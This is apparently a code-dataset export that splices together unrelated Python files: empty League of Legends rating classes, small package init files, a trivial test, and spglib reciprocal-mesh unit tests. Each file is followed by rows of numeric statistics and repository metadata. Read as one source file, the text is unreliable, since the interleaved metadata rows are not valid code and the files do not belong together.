class NA_Janna_Top_JarvanIV(Ratings):
pass
class NA_Janna_Top_Jax(Ratings):
pass
class NA_Janna_Top_Jayce(Ratings):
pass
class NA_Janna_Top_Jhin(Ratings):
pass
class NA_Janna_Top_Jinx(Ratings):
pass
class NA_Janna_Top_Kalista(Ratings):
pass
class NA_Janna_Top_Karma(Ratings):
pass
class NA_Janna_Top_Karthus(Ratings):
pass
class NA_Janna_Top_Kassadin(Ratings):
pass
class NA_Janna_Top_Katarina(Ratings):
pass
class NA_Janna_Top_Kayle(Ratings):
pass
class NA_Janna_Top_Kayn(Ratings):
pass
class NA_Janna_Top_Kennen(Ratings):
pass
class NA_Janna_Top_Khazix(Ratings):
pass
class NA_Janna_Top_Kindred(Ratings):
pass
class NA_Janna_Top_Kled(Ratings):
pass
class NA_Janna_Top_KogMaw(Ratings):
pass
class NA_Janna_Top_Leblanc(Ratings):
pass
class NA_Janna_Top_LeeSin(Ratings):
pass
class NA_Janna_Top_Leona(Ratings):
pass
class NA_Janna_Top_Lissandra(Ratings):
pass
class NA_Janna_Top_Lucian(Ratings):
pass
class NA_Janna_Top_Lulu(Ratings):
pass
class NA_Janna_Top_Lux(Ratings):
pass
class NA_Janna_Top_Malphite(Ratings):
pass
class NA_Janna_Top_Malzahar(Ratings):
pass
class NA_Janna_Top_Maokai(Ratings):
pass
class NA_Janna_Top_MasterYi(Ratings):
pass
class NA_Janna_Top_MissFortune(Ratings):
pass
class NA_Janna_Top_MonkeyKing(Ratings):
pass
class NA_Janna_Top_Mordekaiser(Ratings):
pass
class NA_Janna_Top_Morgana(Ratings):
pass
class NA_Janna_Top_Nami(Ratings):
pass
class NA_Janna_Top_Nasus(Ratings):
pass
class NA_Janna_Top_Nautilus(Ratings):
pass
class NA_Janna_Top_Nidalee(Ratings):
pass
class NA_Janna_Top_Nocturne(Ratings):
pass
class NA_Janna_Top_Nunu(Ratings):
pass
class NA_Janna_Top_Olaf(Ratings):
pass
class NA_Janna_Top_Orianna(Ratings):
pass
class NA_Janna_Top_Ornn(Ratings):
pass
class NA_Janna_Top_Pantheon(Ratings):
pass
class NA_Janna_Top_Poppy(Ratings):
pass
class NA_Janna_Top_Quinn(Ratings):
pass
class NA_Janna_Top_Rakan(Ratings):
pass
class NA_Janna_Top_Rammus(Ratings):
pass
class NA_Janna_Top_RekSai(Ratings):
pass
class NA_Janna_Top_Renekton(Ratings):
pass
class NA_Janna_Top_Rengar(Ratings):
pass
class NA_Janna_Top_Riven(Ratings):
pass
class NA_Janna_Top_Rumble(Ratings):
pass
class NA_Janna_Top_Ryze(Ratings):
pass
class NA_Janna_Top_Sejuani(Ratings):
pass
class NA_Janna_Top_Shaco(Ratings):
pass
class NA_Janna_Top_Shen(Ratings):
pass
class NA_Janna_Top_Shyvana(Ratings):
pass
class NA_Janna_Top_Singed(Ratings):
pass
class NA_Janna_Top_Sion(Ratings):
pass
class NA_Janna_Top_Sivir(Ratings):
pass
class NA_Janna_Top_Skarner(Ratings):
pass
class NA_Janna_Top_Sona(Ratings):
pass
class NA_Janna_Top_Soraka(Ratings):
pass
class NA_Janna_Top_Swain(Ratings):
pass
class NA_Janna_Top_Syndra(Ratings):
pass
class NA_Janna_Top_TahmKench(Ratings):
pass
class NA_Janna_Top_Taliyah(Ratings):
pass
class NA_Janna_Top_Talon(Ratings):
pass
class NA_Janna_Top_Taric(Ratings):
pass
class NA_Janna_Top_Teemo(Ratings):
pass
class NA_Janna_Top_Thresh(Ratings):
pass
class NA_Janna_Top_Tristana(Ratings):
pass
class NA_Janna_Top_Trundle(Ratings):
pass
class NA_Janna_Top_Tryndamere(Ratings):
pass
class NA_Janna_Top_TwistedFate(Ratings):
pass
class NA_Janna_Top_Twitch(Ratings):
pass
class NA_Janna_Top_Udyr(Ratings):
pass
class NA_Janna_Top_Urgot(Ratings):
pass
class NA_Janna_Top_Varus(Ratings):
pass
class NA_Janna_Top_Vayne(Ratings):
pass
class NA_Janna_Top_Veigar(Ratings):
pass
class NA_Janna_Top_Velkoz(Ratings):
pass
class NA_Janna_Top_Vi(Ratings):
pass
class NA_Janna_Top_Viktor(Ratings):
pass
class NA_Janna_Top_Vladimir(Ratings):
pass
class NA_Janna_Top_Volibear(Ratings):
pass
class NA_Janna_Top_Warwick(Ratings):
pass
class NA_Janna_Top_Xayah(Ratings):
pass
class NA_Janna_Top_Xerath(Ratings):
pass
class NA_Janna_Top_XinZhao(Ratings):
pass
class NA_Janna_Top_Yasuo(Ratings):
pass
class NA_Janna_Top_Yorick(Ratings):
pass
class NA_Janna_Top_Zac(Ratings):
pass
class NA_Janna_Top_Zed(Ratings):
pass
class NA_Janna_Top_Ziggs(Ratings):
pass
class NA_Janna_Top_Zilean(Ratings):
pass
class NA_Janna_Top_Zyra(Ratings):
pass
| 15.364508
| 46
| 0.761667
| 972
| 6,407
| 4.59465
| 0.151235
| 0.216301
| 0.370802
| 0.463502
| 0.797582
| 0.797582
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173404
| 6,407
| 416
| 47
| 15.401442
| 0.843278
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
12197db449ed9d2302cb766473a9c19418fe1aa8
| 104
|
py
|
Python
|
snippetscream/__init__.py
|
shaunsephton/django-snippetscream
|
983d9d9909e233dd7c0d15e1e685a708d1b44dc0
|
[
"BSD-3-Clause"
] | 11
|
2015-01-14T13:03:04.000Z
|
2018-04-24T23:32:14.000Z
|
snippetscream/__init__.py
|
shaunsephton/django-snippetscream
|
983d9d9909e233dd7c0d15e1e685a708d1b44dc0
|
[
"BSD-3-Clause"
] | 2
|
2015-03-26T12:54:41.000Z
|
2017-06-08T06:54:22.000Z
|
snippetscream/__init__.py
|
shaunsephton/django-snippetscream
|
983d9d9909e233dd7c0d15e1e685a708d1b44dc0
|
[
"BSD-3-Clause"
] | 4
|
2015-03-26T13:07:14.000Z
|
2019-07-31T20:32:33.000Z
|
from _186 import *
from _963 import *
from _1031 import *
from _1378 import *
import _1875
import _2536
| 14.857143
| 19
| 0.769231
| 16
| 104
| 4.625
| 0.5
| 0.405405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.261905
| 0.192308
| 104
| 6
| 20
| 17.333333
| 0.619048
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
122a56bdb82c76c185efe02228658710d80d62c1
| 191
|
py
|
Python
|
deeptext/__init__.py
|
o-gent/deep-text-recognition-benchmark
|
9e3ea0f21a71a19d957c53e63a30b61ecd7dbf26
|
[
"Apache-2.0"
] | null | null | null |
deeptext/__init__.py
|
o-gent/deep-text-recognition-benchmark
|
9e3ea0f21a71a19d957c53e63a30b61ecd7dbf26
|
[
"Apache-2.0"
] | null | null | null |
deeptext/__init__.py
|
o-gent/deep-text-recognition-benchmark
|
9e3ea0f21a71a19d957c53e63a30b61ecd7dbf26
|
[
"Apache-2.0"
] | null | null | null |
from deeptext import modules
from deeptext import model
from deeptext import dataset
from deeptext import model
from deeptext import test
from deeptext import train
from deeptext import utils
| 27.285714
| 28
| 0.858639
| 28
| 191
| 5.857143
| 0.321429
| 0.512195
| 0.768293
| 0.280488
| 0.5
| 0.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0.141361
| 191
| 7
| 29
| 27.285714
| 1
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1250b167e403fec47514ce3209a8d973cdc1fef6
| 31
|
py
|
Python
|
packages/namespace_packages/folder_a/some_project/alpha.py
|
rockman/learn-python-online
|
9c979fbea7bb2ed502eba2440306ab5a0f4637af
|
[
"MIT"
] | null | null | null |
packages/namespace_packages/folder_a/some_project/alpha.py
|
rockman/learn-python-online
|
9c979fbea7bb2ed502eba2440306ab5a0f4637af
|
[
"MIT"
] | null | null | null |
packages/namespace_packages/folder_a/some_project/alpha.py
|
rockman/learn-python-online
|
9c979fbea7bb2ed502eba2440306ab5a0f4637af
|
[
"MIT"
] | null | null | null |
def run():
return 'alpha'
| 7.75
| 18
| 0.548387
| 4
| 31
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.290323
| 31
| 3
| 19
| 10.333333
| 0.772727
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d62ba5ac2e6872eb76f6c4dcdce9299b3bbc0462
| 40
|
py
|
Python
|
simplecameraman/tests/test_todo.py
|
kyhau/simple-cameraman
|
b25e807db39a39a92c1145877cdc1f8a67bf852d
|
[
"Unlicense"
] | null | null | null |
simplecameraman/tests/test_todo.py
|
kyhau/simple-cameraman
|
b25e807db39a39a92c1145877cdc1f8a67bf852d
|
[
"Unlicense"
] | 1
|
2020-09-25T09:14:38.000Z
|
2020-09-28T09:13:44.000Z
|
simplecameraman/tests/test_todo.py
|
kyhau/simple-cameraman
|
b25e807db39a39a92c1145877cdc1f8a67bf852d
|
[
"Unlicense"
] | 2
|
2017-04-17T11:19:02.000Z
|
2017-08-24T06:35:42.000Z
|
def test_todo():
assert 100 == 10*10
| 20
| 23
| 0.625
| 7
| 40
| 3.428571
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.225806
| 0.225
| 40
| 2
| 23
| 20
| 0.548387
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.5
| true
| 0
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d64297ccc0d0c031f83d79e7f686e74d9e8edafc
| 114
|
py
|
Python
|
remus/etl_pipeline/__init__.py
|
abdala9512/remus
|
b21be11261341d089d27b4370f821c9d3b1bb863
|
[
"MIT"
] | 3
|
2020-08-08T02:18:58.000Z
|
2020-11-11T23:46:34.000Z
|
remus/etl_pipeline/__init__.py
|
abdala9512/remus
|
b21be11261341d089d27b4370f821c9d3b1bb863
|
[
"MIT"
] | 1
|
2021-06-05T03:15:06.000Z
|
2021-06-05T03:15:06.000Z
|
remus/etl_pipeline/__init__.py
|
abdala9512/remus
|
b21be11261341d089d27b4370f821c9d3b1bb863
|
[
"MIT"
] | null | null | null |
from .api_connection import *
from .aws_helper import *
from .sql_helper import *
from .spotify_requests import *
| 28.5
| 31
| 0.789474
| 16
| 114
| 5.375
| 0.5625
| 0.348837
| 0.372093
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140351
| 114
| 4
| 31
| 28.5
| 0.877551
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d64e21b654dd3aa559c2f608f25fb5ed949ede7e
| 15,007
|
py
|
Python
|
python/test/test_reciprocal_mesh.py
|
heirecka/spglib
|
5e5453038c395c62c7f16984135633fb20243d0b
|
[
"BSD-3-Clause"
] | null | null | null |
python/test/test_reciprocal_mesh.py
|
heirecka/spglib
|
5e5453038c395c62c7f16984135633fb20243d0b
|
[
"BSD-3-Clause"
] | null | null | null |
python/test/test_reciprocal_mesh.py
|
heirecka/spglib
|
5e5453038c395c62c7f16984135633fb20243d0b
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import unittest
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import numpy as np
from spglib import (get_ir_reciprocal_mesh,
get_stabilized_reciprocal_mesh,
get_symmetry_dataset,
relocate_BZ_grid_address,
get_grid_points_by_rotations,
get_BZ_grid_points_by_rotations)
from vasp import read_vasp
data_dir = os.path.dirname(os.path.abspath(__file__))
result_ir_rec_mesh = (""" 0 0 0 0
1 1 0 0
2 2 0 0
1 -1 0 0
1 0 1 0
5 1 1 0
6 2 1 0
5 -1 1 0
2 0 2 0
6 1 2 0
10 2 2 0
6 -1 2 0
1 0 -1 0
5 1 -1 0
6 2 -1 0
5 -1 -1 0
1 0 0 1
5 1 0 1
6 2 0 1
5 -1 0 1
5 0 1 1
21 1 1 1
22 2 1 1
21 -1 1 1
6 0 2 1
22 1 2 1
26 2 2 1
22 -1 2 1
5 0 -1 1
21 1 -1 1
22 2 -1 1
21 -1 -1 1
2 0 0 2
6 1 0 2
10 2 0 2
6 -1 0 2
6 0 1 2
22 1 1 2
26 2 1 2
22 -1 1 2
10 0 2 2
26 1 2 2
42 2 2 2
26 -1 2 2
6 0 -1 2
22 1 -1 2
26 2 -1 2
22 -1 -1 2
1 0 0 -1
5 1 0 -1
6 2 0 -1
5 -1 0 -1
5 0 1 -1
21 1 1 -1
22 2 1 -1
21 -1 1 -1
6 0 2 -1
22 1 2 -1
26 2 2 -1
22 -1 2 -1
5 0 -1 -1
21 1 -1 -1
22 2 -1 -1
21 -1 -1 -1""", """ 0 0 0 0
1 1 0 0
2 2 0 0
1 -1 0 0
1 0 1 0
5 1 1 0
5 2 1 0
1 -1 1 0
2 0 2 0
5 1 2 0
2 2 2 0
5 -1 2 0
1 0 -1 0
1 1 -1 0
5 2 -1 0
5 -1 -1 0
16 0 0 1
17 1 0 1
18 2 0 1
17 -1 0 1
17 0 1 1
21 1 1 1
21 2 1 1
17 -1 1 1
18 0 2 1
21 1 2 1
18 2 2 1
21 -1 2 1
17 0 -1 1
17 1 -1 1
21 2 -1 1
21 -1 -1 1""")
result_ir_rec_mesh_distortion = (""" 0 0 0 0
1 1 0 0
1 -1 0 0
3 0 1 0
4 1 1 0
4 -1 1 0
6 0 2 0
7 1 2 0
7 -1 2 0
3 0 -1 0
4 1 -1 0
4 -1 -1 0
3 0 0 1
4 1 0 1
4 -1 0 1
15 0 1 1
16 1 1 1
16 -1 1 1
18 0 2 1
19 1 2 1
19 -1 2 1
15 0 -1 1
16 1 -1 1
16 -1 -1 1
6 0 0 2
7 1 0 2
7 -1 0 2
18 0 1 2
19 1 1 2
19 -1 1 2
30 0 2 2
31 1 2 2
31 -1 2 2
18 0 -1 2
19 1 -1 2
19 -1 -1 2
3 0 0 -1
4 1 0 -1
4 -1 0 -1
15 0 1 -1
16 1 1 -1
16 -1 1 -1
18 0 2 -1
19 1 2 -1
19 -1 2 -1
15 0 -1 -1
16 1 -1 -1
16 -1 -1 -1""", """ 0 0 0 0
1 1 0 0
1 -1 0 0
3 0 1 0
4 1 1 0
5 -1 1 0
6 0 2 0
7 1 2 0
8 -1 2 0
6 0 -2 0
8 1 -2 0
7 -1 -2 0
3 0 -1 0
5 1 -1 0
4 -1 -1 0""", """ 0 0 0 0
1 1 0 0
1 -1 0 0
3 0 1 0
4 1 1 0
4 -1 1 0
3 0 2 0
4 1 2 0
4 -1 2 0
0 0 -1 0
1 1 -1 0
1 -1 -1 0
12 0 0 1
13 1 0 1
13 -1 0 1
15 0 1 1
16 1 1 1
16 -1 1 1
15 0 2 1
16 1 2 1
16 -1 2 1
12 0 -1 1
13 1 -1 1
13 -1 -1 1
24 0 0 2
25 1 0 2
25 -1 0 2
27 0 1 2
28 1 1 2
28 -1 1 2
27 0 2 2
28 1 2 2
28 -1 2 2
24 0 -1 2
25 1 -1 2
25 -1 -1 2
12 0 0 -1
13 1 0 -1
13 -1 0 -1
15 0 1 -1
16 1 1 -1
16 -1 1 -1
15 0 2 -1
16 1 2 -1
16 -1 2 -1
12 0 -1 -1
13 1 -1 -1
13 -1 -1 -1""", """ 0 0 0 0
1 1 0 0
2 -1 0 0
3 0 1 0
4 1 1 0
5 -1 1 0
6 0 2 0
7 1 2 0
7 -1 2 0
3 0 -2 0
5 1 -2 0
4 -1 -2 0
0 0 -1 0
2 1 -1 0
1 -1 -1 0""")
result_bz_grid_address = (""" 0 0 0
1 0 0
2 0 0
-1 0 0
0 1 0
1 1 0
2 1 0
-1 1 0
0 2 0
1 2 0
2 2 0
-1 2 0
0 -1 0
1 -1 0
2 -1 0
-1 -1 0
0 0 1
1 0 1
2 0 1
-1 0 1
0 1 1
1 1 1
2 1 1
-1 1 1
0 2 1
1 2 1
2 2 1
-1 2 1
0 -1 1
1 -1 1
2 -1 1
-1 -1 1
0 0 2
1 0 2
2 0 2
-1 0 2
0 1 2
1 1 2
2 1 2
-1 1 2
0 2 2
1 2 2
2 2 2
-1 2 2
0 -1 2
1 -1 2
2 -1 2
-1 -1 2
0 0 -1
1 0 -1
2 0 -1
-1 0 -1
0 1 -1
1 1 -1
2 1 -1
-1 1 -1
0 2 -1
1 2 -1
2 2 -1
-1 2 -1
0 -1 -1
1 -1 -1
2 -1 -1
-1 -1 -1
-2 0 0
-2 1 0
0 -2 0
1 -2 0
2 -2 0
-2 2 0
-2 -2 0
-1 -2 0
-2 -1 0
-2 0 1
-2 1 1
0 -2 1
1 -2 1
2 -2 1
-2 2 1
-2 -2 1
-1 -2 1
-2 -1 1
0 0 -2
1 0 -2
2 0 -2
-2 0 2
-2 0 -2
-1 0 -2
0 1 -2
1 1 -2
2 1 -2
-2 1 2
-2 1 -2
-1 1 -2
0 2 -2
0 -2 2
0 -2 -2
1 2 -2
1 -2 2
1 -2 -2
2 2 -2
2 -2 2
2 -2 -2
-2 2 2
-2 2 -2
-2 -2 2
-2 -2 -2
-1 2 -2
-1 -2 2
-1 -2 -2
0 -1 -2
1 -1 -2
2 -1 -2
-2 -1 2
-2 -1 -2
-1 -1 -2
-2 0 -1
-2 1 -1
0 -2 -1
1 -2 -1
2 -2 -1
-2 2 -1
-2 -2 -1
-1 -2 -1
-2 -1 -1""", """ 0 0 0
1 0 0
2 0 0
-1 0 0
0 1 0
1 1 0
-2 1 0
-1 1 0
0 2 0
1 -2 0
2 -2 0
-1 2 0
0 -1 0
1 -1 0
2 -1 0
-1 -1 0
0 0 1
1 0 1
2 0 1
-1 0 1
0 1 1
1 1 1
-2 1 1
-1 1 1
0 2 1
1 -2 1
2 -2 1
-1 2 1
0 -1 1
1 -1 1
2 -1 1
-1 -1 1
-2 0 0
0 -2 0
-2 2 0
0 0 -1
1 0 -1
2 0 -1
-2 0 1
-2 0 -1
-1 0 -1
0 1 -1
1 1 -1
-2 1 -1
-1 1 -1
0 2 -1
0 -2 1
0 -2 -1
1 -2 -1
2 -2 -1
-2 2 1
-2 2 -1
-1 2 -1
0 -1 -1
1 -1 -1
2 -1 -1
-1 -1 -1""")
result_bz_map = (""" 0 1 2 -1 -1 -1 64 3 4 5
6 -1 -1 -1 65 7 8 9 10 -1
-1 -1 69 11 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 66 67
68 -1 -1 -1 70 71 12 13 14 -1
-1 -1 72 15 16 17 18 -1 -1 -1
73 19 20 21 22 -1 -1 -1 74 23
24 25 26 -1 -1 -1 78 27 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 75 76 77 -1 -1 -1 79 80
28 29 30 -1 -1 -1 81 31 32 33
34 -1 -1 -1 85 35 36 37 38 -1
-1 -1 91 39 40 41 42 -1 -1 -1
103 43 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 95 98 101 -1
-1 -1 105 108 44 45 46 -1 -1 -1
113 47 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 82 83 84 -1 -1 -1
86 87 88 89 90 -1 -1 -1 92 93
94 97 100 -1 -1 -1 104 107 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 96 99 102 -1 -1 -1 106 109
110 111 112 -1 -1 -1 114 115 48 49
50 -1 -1 -1 116 51 52 53 54 -1
-1 -1 117 55 56 57 58 -1 -1 -1
121 59 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 118 119 120 -1
-1 -1 122 123 60 61 62 -1 -1 -1
124 63""", """ 0 1 2 -1 -1 -1 32 3 4 5
-1 -1 -1 -1 6 7 8 -1 -1 -1
-1 -1 34 11 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 33 9
10 -1 -1 -1 -1 -1 12 13 14 -1
-1 -1 -1 15 16 17 18 -1 -1 -1
38 19 20 21 -1 -1 -1 -1 22 23
24 -1 -1 -1 -1 -1 50 27 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 46 25 26 -1 -1 -1 -1 -1
28 29 30 -1 -1 -1 -1 31 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 35 36 37 -1 -1 -1 39 40
41 42 -1 -1 -1 -1 43 44 45 -1
-1 -1 -1 -1 51 52 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
-1 -1 -1 -1 -1 -1 -1 -1 -1 -1
47 48 49 -1 -1 -1 -1 -1 53 54
55 -1 -1 -1 -1 56""")
class TestReciprocalMesh(unittest.TestCase):
def setUp(self):
identity = np.eye(3, dtype='intc')
file_and_mesh = (
[os.path.join(data_dir, "data", "cubic", "POSCAR-217"), [4, 4, 4]],
[os.path.join(data_dir, "data", "hexagonal", "POSCAR-182"),
[4, 4, 2]])
self.meshes = []
self.cells = []
self.rotations = []
self.grid_addresses = []
for i, (fname, mesh) in enumerate(file_and_mesh):
self.meshes.append(mesh)
self.cells.append(read_vasp(fname))
self.rotations.append(
get_symmetry_dataset(self.cells[i])['rotations'])
_, ga = get_stabilized_reciprocal_mesh(mesh, [identity, ])
self.grid_addresses.append(ga)
def tearDown(self):
pass
def test_get_ir_reciprocal_mesh(self):
for i in range(len(self.cells)):
ir_rec_mesh = get_ir_reciprocal_mesh(self.meshes[i], self.cells[i])
(mapping_table, grid_address) = ir_rec_mesh
# for gp, ga in zip(mapping_table, grid_address):
# print("%4d %3d %3d %3d" % (gp, ga[0], ga[1], ga[2]))
# print("")
data = np.loadtxt(StringIO(result_ir_rec_mesh[i]), dtype='intc')
np.testing.assert_equal(data[:, 0], mapping_table)
np.testing.assert_equal(data[:, 1:4], grid_address)
def test_get_stabilized_reciprocal_mesh(self):
for i in range(len(self.cells)):
ir_rec_mesh = get_stabilized_reciprocal_mesh(
self.meshes[i], self.rotations[i])
(mapping_table, grid_address) = ir_rec_mesh
data = np.loadtxt(StringIO(result_ir_rec_mesh[i]), dtype='intc')
np.testing.assert_equal(data[:, 0], mapping_table)
np.testing.assert_equal(data[:, 1:4], grid_address)
def test_get_ir_reciprocal_mesh_distortion(self):
j = 0
for is_shift in ([0, 0, 0], [0, 1, 0]):
for i, mesh in enumerate(([3, 4, 4], [3, 5, 1])):
ir_rec_mesh = get_ir_reciprocal_mesh(mesh, self.cells[i],
is_shift=is_shift)
(mapping_table, grid_address) = ir_rec_mesh
# for gp, ga in zip(mapping_table, grid_address):
# print("%4d %3d %3d %3d" % (gp, ga[0], ga[1], ga[2]))
# print("")
data = np.loadtxt(StringIO(result_ir_rec_mesh_distortion[j]),
dtype='intc')
np.testing.assert_equal(data[:, 0], mapping_table)
np.testing.assert_equal(data[:, 1:4], grid_address)
j += 1
def test_relocate_BZ_grid_address(self):
for i, (cell, mesh, grid_address) in enumerate(
zip(self.cells, self.meshes, self.grid_addresses)):
reclat = np.linalg.inv(cell[0])
bz_grid_address, bz_map = relocate_BZ_grid_address(
grid_address,
mesh,
reclat)
data = np.loadtxt(StringIO(result_bz_grid_address[i]),
dtype='intc')
np.testing.assert_equal(data, bz_grid_address)
data = [int(i) for i in result_bz_map[i].split()]
np.testing.assert_equal(data, bz_map)
# for i in range(len(bz_map) // 10):
# print(("%3d " * 10) % tuple(bz_map[i * 10: (i + 1) * 10]))
# n = len(bz_map) % 10
# print(("%3d " * n) % tuple(bz_map[-n:]))
def test_get_grid_points_and_bz_grid_points_by_rotations(self):
data = [[21, 31, 61, 55, 31, 61, 55, 21, 55, 21, 31, 61,
61, 55, 21, 31, 61, 55, 21, 31, 55, 21, 31, 61,
21, 31, 61, 55, 31, 61, 55, 21, 55, 21, 31, 61,
61, 55, 21, 31, 61, 55, 21, 31, 55, 21, 31, 61],
[21, 30, 25, 31, 22, 27, 31, 22, 27, 21, 30, 25]]
data_bz = [[21, 31, 61, 55, 31, 61, 55, 21, 55, 21, 31, 61,
61, 55, 21, 31, 61, 55, 21, 31, 55, 21, 31, 61,
21, 31, 61, 55, 31, 61, 55, 21, 55, 21, 31, 61,
61, 55, 21, 31, 61, 55, 21, 31, 55, 21, 31, 61],
[21, 30, 25, 31, 22, 27, 56, 43, 52, 42, 55, 48]]
for i, (cell, mesh, grid_address, rotations) in enumerate(
zip(self.cells, self.meshes, self.grid_addresses,
self.rotations)):
rec_rots = [r.T for r in rotations]
gps = get_grid_points_by_rotations([1, 1, 1],
rec_rots,
mesh)
# print(", ".join(["%d" % g for g in gps]))
np.testing.assert_equal(data[i], gps)
bz_grid_address, bz_map = relocate_BZ_grid_address(
grid_address,
mesh,
np.linalg.inv(cell[0]))
bz_gps = get_BZ_grid_points_by_rotations([1, 1, 1],
rec_rots,
mesh,
bz_map)
# print(", ".join(["%d" % g for g in bz_gps]))
np.testing.assert_equal(data_bz[i], bz_gps)
diff_address = bz_grid_address[:len(grid_address)] - grid_address
np.testing.assert_equal(diff_address % mesh, 0)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestReciprocalMesh)
unittest.TextTestRunner(verbosity=2).run(suite)
# unittest.main()
| 24.243942
| 79
| 0.38542
| 3,010
| 15,007
| 1.854485
| 0.077741
| 0.276603
| 0.305804
| 0.335364
| 0.706736
| 0.662487
| 0.566822
| 0.525797
| 0.51254
| 0.51254
| 0
| 0.370161
| 0.493969
| 15,007
| 618
| 80
| 24.283172
| 0.364893
| 0.032918
| 0
| 0.417808
| 0
| 0
| 0.605214
| 0
| 0
| 0
| 0
| 0
| 0.018836
| 1
| 0.011986
| false
| 0.001712
| 0.013699
| 0
